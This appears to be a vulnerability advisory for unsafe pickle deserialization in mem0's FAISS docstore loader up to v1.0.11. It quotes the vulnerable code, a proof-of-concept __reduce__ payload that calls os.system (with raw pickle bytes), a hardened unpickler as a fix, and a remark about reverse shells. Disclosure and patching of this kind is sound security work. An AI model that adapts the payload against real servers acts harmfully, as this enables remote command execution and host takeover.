| Title | Mem0 <= v1.0.11 Unsafe Deserialization |
|---|---|

### Description
### Summary
An unsafe deserialization via `pickle.load()` in mem0 allows remote command execution on the server host.
### Details
The vulnerability is caused by calling `pickle.load()`, an unsafe function of the pickle serialization library, on the docstore file ([faiss.py#L94](https://github.com/mem0ai/mem0/blob/97cbff77efe49a0cc0132da5c3b4a4649facc8fc/mem0/vector_stores/faiss.py#L94)).
```python
import logging
import pickle

import faiss  # FAISS index library used by this module

logger = logging.getLogger(__name__)
# ...
def _load(self, index_path: str, docstore_path: str):
    """
    Load FAISS index and docstore from disk.
    Args:
        index_path (str): Path to FAISS index file.
        docstore_path (str): Path to docstore pickle file.
    """
    try:
        self.index = faiss.read_index(index_path)
        with open(docstore_path, "rb") as f:
            # pickle.load() reconstructs arbitrary objects, so whoever controls
            # this file controls what code runs at this point.
            self.docstore, self.index_to_id = pickle.load(f)
        logger.info(f"Loaded FAISS index from {index_path} with {self.index.ntotal} vectors")
    except Exception as e:
        logger.warning(f"Failed to load FAISS index: {e}")
        self.docstore = {}
        self.index_to_id = {}
```
### PoC
For a simple proof of concept we're using the bytes representation of the pickled object below:
```python
import os

class Evil:
    # __reduce__ tells pickle which callable to invoke on load; here it is os.system
    def __reduce__(self):
        return (os.system, ("touch pwned",))
```
that is: `\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch pwned\x94\x85\x94R\x94.`.
Using this payload as the content of the pickled docstore file, an attacker can execute arbitrary system commands.
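A hardened replacement for the `pickle.load()` call in `_load`, serving both the Details and the PoC sections above. This is an added example, not mem0's code or its actual patch; `DocstoreUnpickler`, `load_docstore` and the constructed sample inputs are assumed names. It refuses any pickle that names a global, which is what a `__reduce__` payload like the one in the PoC needs in order to reach `os.system`, so such a payload is rejected without ever being executed.

```python
import io
import pickle


class DocstoreUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global lookup.

    A genuine docstore is a (docstore, index_to_id) pair of dicts, lists and
    scalars, which pickle encodes without any GLOBAL/STACK_GLOBAL opcode.  A
    __reduce__ payload, by contrast, must resolve a callable such as
    posix.system by name, and find_class() is the hook that lookup goes through.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            f"refusing to resolve {module}.{name} while loading docstore"
        )


def load_docstore(data: bytes):
    """Return (docstore, index_to_id) from pickle bytes, or raise UnpicklingError."""
    obj = DocstoreUnpickler(io.BytesIO(data)).load()
    # Shape check: anything but a pair of dicts is not a docstore either.
    if not (isinstance(obj, tuple) and len(obj) == 2
            and all(isinstance(part, dict) for part in obj)):
        raise pickle.UnpicklingError("docstore has unexpected structure")
    return obj


def docstore_loads_safely(data: bytes) -> bool:
    """True if the bytes are accepted by load_docstore, False if rejected."""
    try:
        load_docstore(data)
        return True
    except (pickle.UnpicklingError, EOFError, ValueError, TypeError):
        return False


class ReduceProbe:
    """Constructed, harmless stand-in for the advisory's Evil class: its
    __reduce__ names a global (builtins.len), the same mechanism an RCE
    payload uses to reach os.system."""

    def __reduce__(self):
        return (len, ("probe",))


def sample_benign_docstore() -> bytes:
    # Constructed pair of dicts, matching the (self.docstore, self.index_to_id) tuple above
    return pickle.dumps(({"m1": {"text": "hello"}}, {0: "m1"}))


def sample_reduce_payload() -> bytes:
    return pickle.dumps(ReduceProbe())  # constructed hostile input
```

`docstore_loads_safely(sample_benign_docstore())` returns `True` and `docstore_loads_safely(sample_reduce_payload())` returns `False`; the probe's `len` call never runs.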
### Impact
Usually, if attackers can control the FAISS index file, they can poison or manipulate search results by injecting malicious vectors that distort nearest-neighbor retrieval.
In this case, attackers can run arbitrary system commands without any restriction (e.g. they could start a reverse shell and gain access to the server).
The impact is high, as the attacker can completely take over the server host.
### References
- https://docs.python.org/3/library/pickle.html
- https://github.com/mem0ai/mem0/issues/3778 (original advisory)
- https://github.com/mem0ai/mem0/pull/4833 (patch)
### Credits
Edoardo Ottavianelli (@edoardottt)

| Source | ⚠️ https://github.com/mem0ai/mem0/issues/3778 |
|---|---|
| User | edoardottt (UID 94993) |
| Submission | 15.04.2026 08:42 (2 months ago) |
| Moderation | 01.05.2026 11:52 (16 days later) |
| Status | Accepted |
| VulDB Entry | 360550 [mem0ai mem0 up to 1.0.11 faiss.py pickle.load/pickle.dump privilege escalation] |
| Points | 20 |